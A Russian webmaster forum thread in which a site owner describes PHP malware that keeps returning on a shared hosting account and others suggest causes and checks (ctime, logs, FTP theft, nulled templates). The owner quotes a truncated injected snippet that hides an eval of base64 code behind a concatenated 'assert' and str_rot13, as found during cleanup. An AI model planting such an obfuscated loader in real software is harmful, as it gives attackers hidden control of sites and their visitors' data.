- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Добрый день, уже более полугода "лечу" один из аккаунтов на хостинге (название говорить нехочу, чтобы не посчитали антирекламой). Проблема заключается в том, что вирусы каждый раз возвращаются. Что я делаю:
1. Скачиваю файлы
2. Сканирую Ai-bolit-ом, чищу все файлы
3. Осуществляю поиск по файлам (POST, preg_replace и т.д.)
4. Проверяю базу данных
5. Обновляю все плагины и версию движка (WP, Joomla). Хотя вирусы заражают всё популярные CMS, html сайты, папки не принадлежащие не одному из сайтов
6. Меняю все пароли (бд, ftp, хостинг, админка)
Меня смущают 2 вещи
1. Время заражения, к примеру в папке лежат залиты файлы движка все созданы 09.06.16, новый файл с вирусом context.php будет иметь ту же дату создания и будет создан тем же пользователем. Хотя я точно знаю что не 09, ни 10 его там не было (то есть вирус обманывает файловую систему). Тоже самое происходит если вирус дописывает себя в файлы, сервер не видит дату изменений, то есть будет написано последнее изменение 09.06.16
Вот сюда был дописан вредоносный код 1-2 дня назад
2. Вирусные файлы появляются даже в папках без сайтов, была папка на сервере "1111" через какое-то время в ней появилось несколько вирусных файлов.
Собственно возможно ли что проблемы у хостера? Хостер естественно на такой вопрос нормально не ответил.
P.S. Вирусы - зашифрованные куски php кода + формы для загрузки файлов вызываемые GET параметром, если нужно будет - скину
Muzicant, конечно, возможен взлом хостинга.
Но вы не продемонстрировали, что действительно проверили все.
Что насчет проверок новых файлов с помощью ctime ? как здесь :/ru/forum/900084 , хотя этот скрипт не печатает точное время модификации, его надо дополнить.
Важно, чтобы это задача запускалась достаточно часто. Хорошо бы раз в 15 минут.
какова посещаемость? может быть логи за 1-2 дня можно просто глазами проанализировать ?
P.S. Вирусы - зашифрованные куски php кода + формы для загрузки файлов вызываемые GET параметром, если нужно будет - скину
точно нет.
Дело в том, что в логах ничего интересного.
Есть POST запросы на вирусные файлы, причем первый POST может появится 11-го числа (ответ сервера - 200), хотя указано, что сам файл создан 15-го
Или может я не на то смотрю?
Подскажите, пока ставил скрипт что вы посоветовали, нашёл интересный файл, прямо в корне
".bash_history"
и там есть такие строчки:
#1465911485
grep -lr '###=CACHE START=###' ./*
#1465911505
find ./ -name '*.php' | xargs -d'\n' egrep -sl '###=CACHE START=###'
И большинство файлов с вирусами имеют вредонеосный код:
<?php
//###=CACHE START=###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXT.../*ОБРЕЗАЛ*/....wg9"));'));
//###=CACHE END=###
?>
Muzicant, .bash_history - это bash history. Файл с историей команд запускаемых вами (или не вами) в bash. Разумеется, он меняется и скрипт срабатывает. Кто-то искал код и запускал эту команду.
Собственно возможно ли что проблемы у хостера? Х
Возможно просто дыры в скриптах, через которые заливают шелл, с пом которого уже всё отрабатывают и после удаляют.
Возможно увод ФТП.
Возможны ещё др причины.
Но возможно и хостер. На практике это менее вероятная причина.
атрибут "время изменения содержимого" может быть изменен
необходимо смотреть атрибут "время изменения атрибутов" (ctime)
но и это может не сильно помочь т.к. злоумышленники часто меняют ctime у всех файлов сразу, что бы сделать невозможным поиск конкретного файла
если есть доступ, то логи злоумышленник может удалять целиком или выборочно после своей работы
пол года? ))
а почему за это время в вашем списке не появилось "обратиться к специалисту"?
или ваш план такой:
4. ...
5. Обновляю все плагины
6. Меняю все пароли
7. Хакерам надоело восстанавливать свои вирусы и они залили вам в отместку, например, пару сотен чужих фото с фотобанка и забили на вас
8. Фотобанк подал на вас в суд за нарушение авторских прав и отсудил квартиру, авто и всё, что есть
не играйтесь с хакерами
проиграете
Если хотите иметь представление о том, насколько вероятен взлом хостинга, задайте хостеру вопрос о том, как реализована изоляция аккаунтов друг от друга на сервере.
Закройте административную часть сайта, сделайте доступ только с определённого IP адреса и закройте доступ на ваш сайт через FTP.
А та же хотелось бы знать, где вы брали шаблоны для ваших сайтов и те же плагины или компоненты,
если качали халявные или нулёные с интернета, то там куча сюрпризов, в том числе и вирусы и с открытием доступа к сайту.